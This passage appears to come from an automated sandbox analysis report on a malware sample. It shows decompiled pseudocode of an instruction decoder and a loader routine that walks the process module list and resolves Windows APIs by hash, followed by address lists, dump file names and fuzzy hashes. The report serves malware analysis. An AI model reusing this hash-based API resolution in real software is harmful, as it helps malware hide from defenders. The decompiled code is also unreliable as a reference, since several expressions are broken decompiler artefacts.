				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L115;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L53:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L86:
								if(_t427[2] <= 5) {
									L88:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L115:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L122:
										if((_t427[1] & 0x00000004) == 0) {
											L130:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L136;
											} else {
												L133:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L136:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L129:
												_t274 =  &(_t274[1]);
												goto L130;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L127:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L129;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L127;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L122;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L133;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L136;
								}
								L87:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L88;
							}
							if(_t250 != 0x8e) {
								L67:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L88;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L84:
										if(( *_t427 & 0x00000009) != 0) {
											goto L87;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L87;
											}
											goto L88;
										}
										if(_t250 == 0xc5) {
											goto L87;
										}
										if(_t250 == 0x50) {
											goto L84;
										}
									}
									goto L88;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L88;
								} else {
									goto L69;
								}
								while(1) {
									L69:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L88;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L88;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L87;
								}
								goto L88;
							}
							if(_t427[2] == 1) {
								goto L87;
							}
							goto L86;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L87;
							} else {
								goto L88;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L87;
								}
								goto L88;
							} else {
								goto L67;
							}
						}
					}
					if(_t427[3] == 3) {
						L52:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L53;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L53;
							}
							goto L52;
						}
						_t413 = _t413 + 2;
					}
					goto L52;
				}
			}

0x6ea09377
0x6ea0937b
0x6ea09387
0x6ea0938b
0x6ea0938f
0x6ea09394
0x6ea09397
0x6ea09399
0x6ea0939b
0x6ea0939b
0x6ea0939e
0x6ea093a4
0x6ea0941c
0x6ea09420
0x6ea09423
0x6ea09423
0x6ea09426
0x00000000
0x6ea09426
0x6ea093ab
0x6ea09413
0x6ea09417
0x00000000
0x6ea09417
0x6ea093b2
0x6ea0940b
0x6ea0940e
0x00000000
0x6ea0940e
0x6ea093b7
0x6ea093f5
0x6ea093fc
0x6ea093ff
0x6ea093c8
0x6ea093c8
0x6ea093ce
0x00000000
0x00000000
0x6ea093d3
0x6ea093d4
0x6ea093d4
0x6ea09429
0x6ea09429
0x6ea09429
0x6ea09432
0x6ea0943b
0x6ea0943e
0x6ea09441
0x6ea09444
0x6ea09447
0x6ea0944d
0x6ea0948f
0x6ea09492
0x6ea09493
0x6ea0949a
0x6ea0949d
0x6ea0944f
0x6ea09453
0x6ea0945d
0x6ea09464
0x6ea09466
0x6ea0947f
0x6ea09482
0x6ea09482
0x6ea09464
0x6ea094a5
0x6ea094a8
0x6ea094ab
0x6ea094af
0x6ea094b3
0x6ea094bd
0x6ea094c1
0x6ea094cb
0x6ea094d4
0x6ea094e1
0x6ea094e4
0x6ea094e7
0x6ea094e7
0x6ea094f3
0x6ea094fe
0x6ea09504
0x6ea09508
0x6ea094f5
0x6ea094f5
0x6ea094f5
0x6ea09510
0x6ea0953a
0x6ea09540
0x6ea09540
0x6ea09548
0x6ea098f1
0x6ea098f7
0x6ea098fd
0x6ea098fd
0x00000000
0x6ea0954e
0x6ea0954e
0x6ea09552
0x6ea09555
0x6ea09558
0x6ea0955b
0x6ea0955f
0x6ea09561
0x6ea09564
0x6ea09567
0x6ea0956b
0x6ea09570
0x6ea09573
0x6ea09577
0x6ea0957c
0x6ea0957f
0x6ea09581
0x6ea09584
0x6ea09588
0x6ea0958d
0x6ea0959d
0x6ea095a3
0x6ea095a3
0x6ea095ab
0x6ea095ad
0x6ea095b6
0x6ea095b8
0x6ea095bb
0x6ea095c6
0x6ea095f3
0x6ea095c8
0x6ea095df
0x6ea095df
0x6ea095fb
0x6ea09601
0x6ea09607
0x6ea09607
0x6ea095fb
0x6ea095b6
0x6ea0960e
0x6ea0967f
0x6ea09684
0x6ea096dd
0x6ea0979f
0x6ea097a4
0x6ea097b3
0x6ea097b9
0x6ea097bd
0x6ea097c6
0x6ea097cd
0x6ea097d6
0x6ea097e4
0x6ea097e7
0x6ea097cf
0x6ea097cf
0x6ea097cf
0x6ea097cd
0x6ea097f0
0x6ea0981d
0x6ea09830
0x6ea09838
0x6ea0981f
0x6ea09821
0x6ea09829
0x6ea09829
0x6ea097f2
0x6ea097f7
0x6ea09816
0x6ea097f9
0x6ea097fe
0x6ea0980f
0x6ea09800
0x6ea09800
0x6ea09800
0x6ea097fe
0x6ea097f7
0x6ea09840
0x6ea0984f
0x6ea0985c
0x6ea09865
0x6ea09869
0x6ea0986d
0x6ea09870
0x6ea09873
0x6ea09876
0x6ea09879
0x6ea0987c
0x6ea09882
0x6ea09886
0x6ea0988c
0x6ea0988c
0x6ea09882
0x6ea09892
0x6ea098cf
0x6ea098d3
0x6ea098da
0x6ea098e0
0x6ea09894
0x6ea09897
0x6ea098b7
0x6ea098bb
0x6ea098c2
0x6ea098c9
0x6ea09899
0x6ea0989c
0x6ea0989e
0x6ea098a2
0x6ea098ac
0x6ea098b2
0x6ea098b2
0x6ea0989c
0x6ea09897
0x6ea098e7
0x6ea098e7
0x6ea09900
0x6ea09900
0x6ea09906
0x6ea0990b
0x6ea09965
0x6ea0996a
0x6ea099a9
0x6ea099ae
0x6ea099b0
0x6ea099b4
0x6ea099b7
0x6ea099ba
0x6ea099bc
0x6ea099bd
0x6ea099bd
0x6ea099c2
0x6ea099e0
0x6ea099e2
0x6ea099e6
0x6ea099ec
0x6ea099ef
0x6ea099f1
0x6ea099f2
0x6ea099f2
0x00000000
0x6ea099c4
0x6ea099c4
0x6ea099c4
0x6ea099c8
0x6ea099ce
0x6ea099d1
0x6ea099d3
0x6ea099d6
0x6ea099f5
0x6ea099f5
0x6ea099fc
0x6ea09a16
0x6ea099fe
0x6ea099fe
0x6ea09a0a
0x6ea09a0b
0x6ea09a0e
0x6ea09a0e
0x6ea09a24
0x6ea09a24
0x6ea099c2
0x6ea0996f
0x6ea0997d
0x6ea09995
0x6ea09999
0x6ea0999c
0x6ea099a2
0x6ea099a6
0x6ea099a6
0x00000000
0x6ea099a6
0x6ea0997f
0x6ea09983
0x6ea09989
0x6ea09989
0x6ea0998f
0x00000000
0x6ea0998f
0x6ea09971
0x6ea09975
0x00000000
0x6ea09975
0x6ea0990f
0x6ea0993b
0x6ea09953
0x6ea09957
0x6ea0995a
0x6ea0995d
0x6ea0995f
0x6ea09962
0x6ea0993d
0x6ea0993d
0x6ea09941
0x6ea09944
0x6ea09947
0x6ea0994a
0x6ea0994d
0x6ea0994d
0x00000000
0x6ea0993b
0x6ea09915
0x00000000
0x00000000
0x6ea0991b
0x6ea0991f
0x6ea09925
0x6ea09928
0x6ea0992b
0x6ea0992e
0x00000000
0x6ea0992e
0x6ea097a6
0x6ea097aa
0x6ea097b0
0x00000000
0x6ea097b0
0x6ea096e8
0x6ea096fa
0x6ea096ff
0x6ea0976a
0x00000000
0x00000000
0x6ea09771
0x6ea09797
0x6ea0979b
0x00000000
0x00000000
0x6ea0977a
0x6ea0977f
0x6ea09793
0x00000000
0x00000000
0x00000000
0x6ea09795
0x6ea09786
0x00000000
0x00000000
0x6ea0978b
0x00000000
0x00000000
0x6ea0978d
0x00000000
0x6ea09771
0x6ea09701
0x6ea0970b
0x6ea0971c
0x6ea0971f
0x6ea09722
0x6ea09728
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0972e
0x6ea0972e
0x6ea0972e
0x6ea09735
0x00000000
0x00000000
0x6ea09737
0x6ea0973a
0x6ea09740
0x00000000
0x00000000
0x00000000
0x6ea09742
0x6ea09744
0x6ea0974d
0x00000000
0x00000000
0x6ea09761
0x00000000
0x00000000
0x00000000
0x6ea09763
0x6ea096ef
0x00000000
0x00000000
0x00000000
0x6ea096f5
0x6ea09689
0x6ea096b8
0x6ea096b9
0x6ea096c2
0x00000000
0x6ea096d3
0x00000000
0x6ea096d3
0x6ea09690
0x6ea09693
0x6ea096a6
0x6ea096a7
0x6ea096ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea09693
0x6ea09689
0x6ea09615
0x6ea09672
0x6ea09676
0x6ea0967c
0x00000000
0x6ea0967c
0x6ea09617
0x6ea0961b
0x6ea09628
0x6ea0962c
0x6ea09642
0x6ea0964a
0x6ea0962e
0x6ea09630
0x6ea0963a
0x6ea0963a
0x6ea09650
0x6ea09659
0x6ea09670
0x00000000
0x00000000
0x00000000
0x6ea09670
0x6ea0965b
0x6ea0965b
0x00000000
0x6ea09650

Strings

, xrefs: 6EA099DB

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 41182ea1c07d7c712dc4ec82f7aafdb80f4a4b36162bb6c4f3f3bc9b93f16e79
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 5222C1314083868FD715CF95E5A136ABBE0BFC6308F18886DE8E54B291D3359DC9CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6EA0143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6EA00304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6ea0d208 == 0 ||  *0x6ea0d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6EA04FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6ea0d2f0 |  *0x6ea0d2f1;
									if(( *0x6ea0d2f0 |  *0x6ea0d2f1) == 0) {
										_t525 =  *0x6ea0d208; // 0x1011340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6ea0d2f0 = 1;
											_t526 = E6EA0361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6EA01C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6ea0d208 = _t526;
											 *0x6ea0d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6EA0361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6EA01C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E9FDFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E9FDFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6ea0d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6ea0d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E9FE8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6EA0306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6ea0d2e4 = 1;
					E6E9FF584( &(_t535[0x38]), 0);
					E6E9FF584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E9FF4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6EA0306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E9FF828( &(_t535[0xc]), E6E9FF4CC( &(_t535[8])) + 0x14);
								_t369 = E6E9FF4BC( &(_t535[0xc]), E6E9FF4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E9FF654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E9FF584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E9FF654( &(_t535[8]));
							E6E9FF654( &(_t535[0x164]));
							E6E9FF584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E9FF584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6EA01D34(0x60a28c5c);
							_t290 = E6EA012EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6EA01C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6E9FD014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6EA05CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6EA05D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6EA08E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E9FF654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E9FBB44( &(_t535[0x110]));
							}
							E6E9FCFDC( &(_t535[0x104]));
							E6E9FCFDC(_t518);
							E6E9FCFDC( &(_t535[0x15c]));
							E6E9FCFDC( &(_t535[0x154]));
							E6EA090EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E9FF618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6EA090B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E9FF4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E9FF4CC( &(_t535[0x44]));
								_t519 =  *(0x6ea0bd40 + _t381 * 4);
								_t531 = E6EA0907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6EA087E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E9FF4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E9FF4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E9FF4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E9FF828( &(_t535[0x20]), E6E9FF4CC( &(_t535[0x1c])) + 8);
										E6E9FF4BC( &(_t535[0x20]), E6E9FF4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
